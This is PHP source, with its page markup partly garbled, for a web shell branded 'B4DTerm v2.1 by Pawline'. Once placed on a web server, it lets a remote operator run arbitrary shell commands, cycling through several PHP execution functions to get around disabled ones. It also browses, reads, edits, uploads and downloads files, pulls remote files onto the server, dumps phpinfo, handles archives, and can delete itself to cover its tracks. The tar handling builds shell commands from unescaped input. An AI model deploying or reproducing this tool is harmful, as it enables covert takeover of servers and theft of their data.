Secure Terminal© Pawline

SECURE ACCESS

Authentication Required

" . (isset($error_msg) ? "

$error_msg

" : "") . "
#
ACCESS AT YOUR OWN RISK
"); } $session_expire = 3600; if (isset($_SESSION['access_time']) && (time() - $_SESSION['access_time'] > $session_expire)) { session_destroy(); header("Location: " . $_SERVER['PHP_SELF']); exit; } if (!isset($_SESSION['current_path'])) $_SESSION['current_path'] = getcwd(); function scan_directory($dir) { $items = []; if (is_dir($dir)) { $entries = scandir($dir); foreach ($entries as $entry) { if ($entry != '.' && $entry != '..') { $full_path = $dir . '/' . $entry; $items[] = [ 'name' => $entry, 'is_dir' => is_dir($full_path), 'size' => is_file($full_path) ? filesize($full_path) : 0, 'modified' => filemtime($full_path) ]; } } } usort($items, function($a, $b) { return $b['modified'] - $a['modified']; }); return $items; } function generate_path($path) { $segments = explode('/', trim($path, '/')); $output = ''; if (empty($segments[0])) { return '/'; } foreach ($segments as $idx => $segment) { if ($segment === '') continue; if ($idx > 0) { $output .= ''; } if ($idx === 0 && $segment === 'home') { $output .= ''; $output .= ''; $output .= '' . htmlspecialchars($segment) . ''; $output .= ''; } else { $output .= '' . htmlspecialchars($segment) . ''; } } return $output; } function format_file_size($bytes) { if ($bytes >= 1073741824) { return number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { return $bytes . ' bytes'; } elseif ($bytes == 1) { return $bytes . ' byte'; } else { return '0 bytes'; } } if (isset($_GET['fetch'])) { $target_file = $_SESSION['current_path'] . '/' . $_GET['fetch']; if (file_exists($target_file)) { $save_name = $_GET['saveas'] ?? basename($target_file); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$save_name.'"'); header('Content-Length: ' . filesize($target_file)); readfile($target_file); exit; } } if (isset($_POST['view_file'])) { $file_path = $_SESSION['current_path'] . '/' . $_POST['view_file']; if (file_exists($file_path) && is_file($file_path)) { $file_content = file_get_contents($file_path); echo json_encode(['status' => true, 'data' => $file_content]); } else { echo json_encode(['status' => false, 'message' => 'File not found']); } exit; } if (isset($_POST['update_file'])) { $file_path = $_SESSION['current_path'] . '/' . $_POST['update_file']; $new_content = $_POST['data']; if (file_put_contents($file_path, $new_content) !== false) { echo json_encode(['status' => true]); } else { echo json_encode(['status' => false, 'message' => 'Write operation failed']); } exit; } if (isset($_POST['remote_fetch'])) { $remote_url = $_POST['url']; $local_name = $_POST['remote_filename'] ?? basename($remote_url); if (!filter_var($remote_url, FILTER_VALIDATE_URL)) { echo json_encode(['status' => false, 'message' => 'Invalid URL format']); exit; } $destination = $_SESSION['current_path'] . '/' . $local_name; $remote_data = @file_get_contents($remote_url); if ($remote_data !== false && file_put_contents($destination, $remote_data) !== false) { echo json_encode(['status' => true, 'path' => $destination, 'size' => strlen($remote_data)]); } else { echo json_encode(['status' => false, 'message' => 'Download failed']); } exit; } if (isset($_POST['network_info'])) { $client_ip = $_SERVER['HTTP_CLIENT_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR']; $server_ip = $_SERVER['SERVER_ADDR']; $host = gethostname(); echo json_encode([ 'status' => true, 'client' => $client_ip, 'server' => $server_ip, 'hostname' => $host ]); exit; } if (isset($_POST['php_info'])) { ob_start(); phpinfo(); $phpinfo = ob_get_clean(); // Extract only the body content preg_match('/]*>(.*?)<\/body>/is', $phpinfo, $matches); $phpinfo_body = isset($matches[1]) ? $matches[1] : $phpinfo; echo json_encode([ 'status' => true, 'html' => $phpinfo_body ]); exit; } if (isset($_POST['compress_action'])) { $action = $_POST['compress_action']; $target = $_POST['compress_target'] ?? ''; $archive_name = $_POST['archive_name'] ?? ''; $current_path = $_SESSION['current_path']; $target_path = $current_path . '/' . $target; $archive_path = $current_path . '/' . $archive_name; $response = ['status' => false, 'message' => '']; if ($action === 'zip') { if (!class_exists('ZipArchive')) { $response['message'] = 'ZipArchive extension not available'; } elseif (!file_exists($target_path)) { $response['message'] = 'Target not found'; } else { $zip = new ZipArchive(); if ($zip->open($archive_path, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { if (is_dir($target_path)) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($target_path), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($target_path) + 1); $zip->addFile($filePath, $relativePath); } } } else { $zip->addFile($target_path, basename($target_path)); } $zip->close(); $response['status'] = true; $response['message'] = "Archive created: " . basename($archive_path); $response['path'] = $archive_path; } else { $response['message'] = 'Failed to create archive'; } } } elseif ($action === 'unzip') { if (!class_exists('ZipArchive')) { $response['message'] = 'ZipArchive extension not available'; } elseif (!file_exists($target_path)) { $response['message'] = 'Archive not found'; } elseif (strtolower(pathinfo($target_path, PATHINFO_EXTENSION)) !== 'zip') { $response['message'] = 'File is not a ZIP archive'; } else { $zip = new ZipArchive(); if ($zip->open($target_path) === TRUE) { // Determine extraction path if (!empty($archive_name)) { $extract_path = $current_path . '/' . $archive_name; } else { // Use filename without extension as folder name $extract_path = $current_path . '/' . pathinfo($target, PATHINFO_FILENAME); } // Create extraction directory if it doesn't exist if (!is_dir($extract_path)) { if (!mkdir($extract_path, 0755, true)) { $response['message'] = 'Failed to create extraction directory'; echo json_encode($response); exit; } } // Extract all files $extracted = $zip->extractTo($extract_path); $zip->close(); if ($extracted) { $response['status'] = true; $response['message'] = "Extracted to: " . basename($extract_path); $response['path'] = $extract_path; $response['files_extracted'] = true; } else { $response['message'] = 'Failed to extract archive (no files extracted)'; } } else { $response['message'] = 'Failed to open archive (invalid or corrupted ZIP)'; } } } elseif ($action === 'tar') { if (!file_exists($target_path)) { $response['message'] = 'Target not found'; } else { $compress_cmd = is_dir($target_path) ? '-czf' : '-czf'; $cmd = "tar $compress_cmd '$archive_path' '$target' 2>&1"; chdir($current_path); exec($cmd, $output, $return_code); if ($return_code === 0 && file_exists($archive_path)) { $response['status'] = true; $response['message'] = "TAR archive created: " . basename($archive_path); $response['path'] = $archive_path; } else { $response['message'] = 'TAR command failed: ' . implode("\n", $output); } } } elseif ($action === 'untar') { if (!file_exists($target_path)) { $response['message'] = 'Archive not found'; } elseif (!preg_match('/\.(tar\.gz|tgz|tar)$/i', $target)) { $response['message'] = 'File is not a TAR archive (.tar.gz, .tgz, .tar)'; } else { $extract_path = $current_path; if (!empty($archive_name)) { $extract_path .= '/' . $archive_name; if (!is_dir($extract_path)) { mkdir($extract_path, 0755, true); } } $cmd = "tar -xzf '$target' -C '$extract_path' 2>&1"; chdir($current_path); exec($cmd, $output, $return_code); if ($return_code === 0) { $response['status'] = true; $response['message'] = "TAR archive extracted to: " . basename($extract_path); $response['path'] = $extract_path; } else { $response['message'] = 'TAR extract failed: ' . implode("\n", $output); } } } echo json_encode($response); exit; } // Fungsi extract zip standalone (opsional) if (isset($_POST['extract_zip'])) { $zip_file = $_POST['zip_file'] ?? ''; $extract_to = $_POST['extract_to'] ?? ''; $current_path = $_SESSION['current_path']; $zip_path = $current_path . '/' . $zip_file; $response = ['status' => false, 'message' => '']; if (!class_exists('ZipArchive')) { $response['message'] = 'ZipArchive extension not available'; } elseif (!file_exists($zip_path)) { $response['message'] = 'ZIP file not found'; } elseif (strtolower(pathinfo($zip_path, PATHINFO_EXTENSION)) !== 'zip') { $response['message'] = 'File is not a ZIP archive'; } else { $zip = new ZipArchive(); if ($zip->open($zip_path) === TRUE) { // Determine extraction directory if (empty($extract_to)) { $extract_to = pathinfo($zip_file, PATHINFO_FILENAME); } $extract_path = $current_path . '/' . $extract_to; // Create extraction directory if (!is_dir($extract_path)) { if (!mkdir($extract_path, 0755, true)) { $response['message'] = 'Failed to create extraction directory'; echo json_encode($response); exit; } } // Count total files for progress (optional) $fileCount = $zip->numFiles; // Extract all files if ($zip->extractTo($extract_path)) { $zip->close(); // Verify extraction by checking if any files were extracted $extracted_files = glob($extract_path . '/*'); if (count($extracted_files) > 0) { $response['status'] = true; $response['message'] = "Successfully extracted {$fileCount} files to: " . basename($extract_path); $response['path'] = $extract_path; $response['file_count'] = $fileCount; } else { $response['message'] = 'Archive extracted but no files found (might be empty)'; } } else { $zip->close(); $response['message'] = 'Failed to extract files from archive'; } } else { $response['message'] = 'Cannot open ZIP file (may be corrupted or invalid format)'; } } echo json_encode($response); exit; } function detect_capabilities() { $execution_methods = [ 'shell_exec', 'exec', 'passthru', 'system', 'popen', 'proc_open' ]; shuffle($execution_methods); foreach ($execution_methods as $method) { if (function_exists($method)) { if ($method === 'shell_exec') { $test = @shell_exec('echo ' . md5(time())); if ($test !== false && trim($test) === md5(time())) { return $method; } } elseif ($method === 'exec') { $output = null; $result = @exec('echo ' . md5(time()), $output); if ($result !== false && isset($output[0]) && $output[0] === md5(time())) { return $method; } } elseif ($method === 'passthru') { ob_start(); @passthru('echo ' . md5(time()), $return_code); $output = ob_get_clean(); if (trim($output) === md5(time())) { return $method; } } elseif ($method === 'system') { ob_start(); $result = @system('echo ' . md5(time()), $return_code); $output = ob_get_clean(); if ($result !== false && trim($output) === md5(time())) { return $method; } } elseif ($method === 'popen') { $handle = @popen('echo ' . md5(time()), 'r'); if ($handle !== false) { $output = fread($handle, 1024); pclose($handle); if (trim($output) === md5(time())) { return $method; } } } elseif ($method === 'proc_open') { $descriptors = [ 0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"] ]; $process = @proc_open('echo ' . md5(time()), $descriptors, $pipes); if (is_resource($process)) { $output = stream_get_contents($pipes[1]); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); if (trim($output) === md5(time())) { return $method; } } } } } return 'disabled'; } function process_instruction($instruction) { $method = detect_capabilities(); $result_output = ''; $execution_success = false; if ($method === 'disabled') { return ['output' => '', 'method' => 'disabled', 'success' => false]; } chdir($_SESSION['current_path']); if (strpos($instruction, '2>&1') === false && strpos($instruction, '2>') === false) { $instruction .= ' 2>&1'; } switch ($method) { case 'shell_exec': $result_output = @shell_exec($instruction); $execution_success = ($result_output !== false && $result_output !== null); break; case 'exec': $output_array = []; $last_line = @exec($instruction, $output_array, $return_code); $result_output = implode("\n", $output_array); $execution_success = ($return_code === 0); break; case 'passthru': ob_start(); @passthru($instruction, $return_code); $result_output = ob_get_clean(); $execution_success = ($return_code === 0); break; case 'system': ob_start(); $last_line = @system($instruction, $return_code); $result_output = ob_get_clean(); $execution_success = ($return_code === 0); break; case 'popen': $handle = @popen($instruction, 'r'); if ($handle) { while (!feof($handle)) { $result_output .= fread($handle, 4096); } $return_code = pclose($handle); $execution_success = ($return_code === 0); } else { $execution_success = false; } break; case 'proc_open': $descriptors = [ 0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"] ]; $process = @proc_open($instruction, $descriptors, $pipes); if (is_resource($process)) { fclose($pipes[0]); $result_output = stream_get_contents($pipes[1]); $error_output = stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); $return_code = proc_close($process); if (empty($result_output) && !empty($error_output)) { $result_output = $error_output; } $execution_success = ($return_code === 0); } else { $execution_success = false; } break; default: $result_output = "Execution method unavailable"; $execution_success = false; } if ($result_output === false) $result_output = ''; if ($result_output === null) $result_output = ''; return [ 'output' => $result_output, 'method' => $method, 'success' => $execution_success ]; } if (isset($_POST['command'])) { header('Content-Type: application/json'); // Rate limiting sederhana if (!isset($_SESSION['command_count'])) { $_SESSION['command_count'] = 0; $_SESSION['command_time'] = time(); } $current_time = time(); if ($current_time - $_SESSION['command_time'] > 60) { $_SESSION['command_count'] = 0; $_SESSION['command_time'] = $current_time; } $_SESSION['command_count']++; if ($_SESSION['command_count'] > 150) { echo json_encode(['output' => 'Rate limit exceeded. Please wait...', 'error' => true]); exit; } $user_input = trim($_POST['command']); $response = ['output' => '', 'path' => $_SESSION['current_path'], 'method' => 'disabled', 'success' => false, 'error' => false]; if ($user_input === 'remove_system') { if (unlink(__FILE__)) { $response['output'] = "System removed successfully."; session_destroy(); } else { $response['output'] = "Removal failed."; $response['error'] = true; } echo json_encode($response); exit; } if (strpos($user_input, 'cd ') === 0) { $new_path = substr($user_input, 3); $previous_path = $_SESSION['current_path']; chdir($_SESSION['current_path']); if (@chdir($new_path)) { $updated_path = getcwd(); $_SESSION['current_path'] = $updated_path; $response['path'] = $_SESSION['current_path']; $response['output'] = "Directory changed:\n" . " From: " . $previous_path . "\n" . " To: " . $updated_path; } else { $response['output'] = "Error: Path not found - " . $new_path; $response['error'] = true; } echo json_encode($response); exit; } $execution_result = process_instruction($user_input); $response['output'] = $execution_result['output']; $response['method'] = $execution_result['method']; $response['success'] = $execution_result['success']; $response['error'] = !$execution_result['success']; if (empty($response['output']) && $response['success'] && !$response['error']) { $response['output'] = "✓ Command executed (no output)"; } echo json_encode($response); exit; } if (isset($_FILES['upload_data'])) { $upload_path = $_SESSION['current_path'] . '/' . basename($_FILES['upload_data']['name']); $upload_status = move_uploaded_file($_FILES['upload_data']['tmp_name'], $upload_path); echo json_encode(['status' => $upload_status, 'path' => $upload_path]); exit; } $detected_method = detect_capabilities(); $directory_contents = scan_directory($_SESSION['current_path']); ?> B4DTerm v2.1 by Pawline
B4DTerminal © Pawline
Process ID:
$